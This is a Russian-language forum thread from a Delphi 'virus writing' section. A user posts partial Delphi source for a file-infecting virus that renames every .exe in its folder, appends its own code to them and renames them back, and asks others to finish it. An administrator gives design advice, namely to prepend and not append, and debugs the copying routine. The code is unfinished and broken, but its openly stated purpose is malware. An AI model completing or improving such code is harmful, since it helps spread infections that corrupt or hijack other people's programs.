Вторник, 21.11.2017, 11:11 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx 
delfcode » Delphi » Вирусология Delphi » Вот минут за 20 состряпал подобие (Написал очередной, заражение не такое как обычно)
Вот минут за 20 состряпал подобие
link993Дата: Среда, 11.05.2011, 20:45 | Сообщение # 1
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Помогите исправить ошибки и доработать...
ВИРУС ПОКА НЕ РАБОТАЕТ, ПОЭТОМУ И ОБРАТИЛСЯ К ВАМ ЗА ПОМОЩЬЮ...

АЛГОРИТМ ВИРУСА:
1. (procedure gotomark) Находим все файлы .exe (даже сам вирус) в папке вместе с ним и переименовываем их в формат .txt
2. (Procedure infect) Добавляем код вируса в формате .txt к коду найденных файлов (тут помогите пжл)...
3. (procedure obratno)Меняем расширения фалов обратно в .exe

Люди я заражаю таким способом файлы впервые (пжл помогите довести этот вирус до ума)... sad :( sad :(

Код
program root;

{$APPTYPE CONSOLE}
uses
SysUtils;

var
f, y: string ;
searchResult : TSearchRec;

procedure gotomark;
begin
if FindFirst('*.exe', faAnyFile, searchResult) = 0 then
begin
repeat
f:= (searchResult.Name);
y:= ChangeFileExt(f, '.txt');
RenameFile(f, y);

until FindNext(searchResult) <> 0;
end;
end;

Procedure infect;
const
Fn1 = 'как тут указать найденный файл??' ;
Fn2 = 'root.txt';
var
F1, F2 : TextFile;
S : String;
begin
AssignFile(F1, Fn1);
Append(F1);
AssignFile(F2, Fn2);
Reset(F2);
//Если второй файл не пуст, добавляем перевод на следующую строку в первом файле.
if not Eof(F2) then Writeln(F1);
//Переписываем содержание второго фала в конец первого файла.
while not Eof(F2) do begin
Readln(F2, S);
Writeln(F1, S);
end;
CloseFile(F1);
CloseFile(F2);
end;

procedure obratno;
var
g,d:string;
begin
if FindFirst('*.txt', faAnyFile, searchResult) = 0 then
begin
repeat
g:= (searchResult.Name);
d:= ChangeFileExt(g, '.exe');
RenameFile(g, d);
until FindNext(searchResult) <> 0;
end;
end;
end.


Сообщение отредактировал link993 - Среда, 11.05.2011, 20:48
 
dolphinДата: Среда, 11.05.2011, 21:21 | Сообщение # 2
Администратор
Сообщений: 902
Статус: Offline
Конечно отредактировать не проблема, но сразу возникает вопрос - Procedure infect добавляет данные в конец файла в этом смысл нет, тк такая структура работать не будет, добавлять нужно в начало. Переименовывать в текстовый не обязательно.

Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
link993Дата: Среда, 11.05.2011, 21:27 | Сообщение # 3
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
dolphin, даже если добавить в начало через .txt зараженный файл работать не будет))) это скорее вредилка такая чем вирус))) Мне сказали надо файл побайтно добавлять чтобы зараженная программа работала))) Можете пжл этот "Вирус" довести до ума, а потом я займусь модификацией))) Заранее спасибо smile :)

Сообщение отредактировал link993 - Среда, 11.05.2011, 21:28
 
link993Дата: Среда, 11.05.2011, 21:31 | Сообщение # 4
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Насколько я помню зараженные программы вирусом Zerofil не работают тоже, хотя на его примере можно создать очень мощный вирус...
 
dolphinДата: Среда, 11.05.2011, 21:38 | Сообщение # 5
Администратор
Сообщений: 902
Статус: Offline
Вирус написаный по вашему принципу.

Доступно только для пользователей


Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик


Сообщение отредактировал dolphin - Пятница, 13.05.2011, 21:48
 
link993Дата: Среда, 11.05.2011, 21:42 | Сообщение # 6
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
dolphin, я у Вас просил исходник вируса, Вы мне тогда его высылали... Спасибо smile Ладно я наверно пойду))) буду ждать пока Вы исправите мой Вирус)))) Заранее спасибо!! Успехов Вам во всем и всего самого наилучшего....

Сообщение отредактировал link993 - Четверг, 12.05.2011, 14:53
 
dolphinДата: Пятница, 13.05.2011, 21:07 | Сообщение # 7
Администратор
Сообщений: 902
Статус: Offline
У меня почему то переписывает не весь файл, постоянно останавливается на нескольких килобайтах, по моему проблема в Eof(F2), кто подскажет почему?

Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
link993Дата: Пятница, 13.05.2011, 21:25 | Сообщение # 8
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
dolphin, нет по отдельности код пашет, пробовал два текстовых файла склеивать))
 
link993Дата: Пятница, 13.05.2011, 21:26 | Сообщение # 9
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
dolphin, только что понял, что для работы зерофила надо его упаковать)) Опробовал я только что его))0 Круть
 
dolphinДата: Пятница, 13.05.2011, 21:50 | Сообщение # 10
Администратор
Сообщений: 902
Статус: Offline
Вот именно
Quote (link993)
два текстовых
склеит запросто а программный не хочет.



Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
link993Дата: Пятница, 13.05.2011, 21:53 | Сообщение # 11
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Спасибо за это))
 
link993Дата: Пятница, 13.05.2011, 21:58 | Сообщение # 12
Участник
Зарегистрирован: 13.02.2011
Группа: Пользователи
Сообщений: 93
Статус: Offline
Да, записаывает только малую часть)))
 
delfcode » Delphi » Вирусология Delphi » Вот минут за 20 состряпал подобие (Написал очередной, заражение не такое как обычно)
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz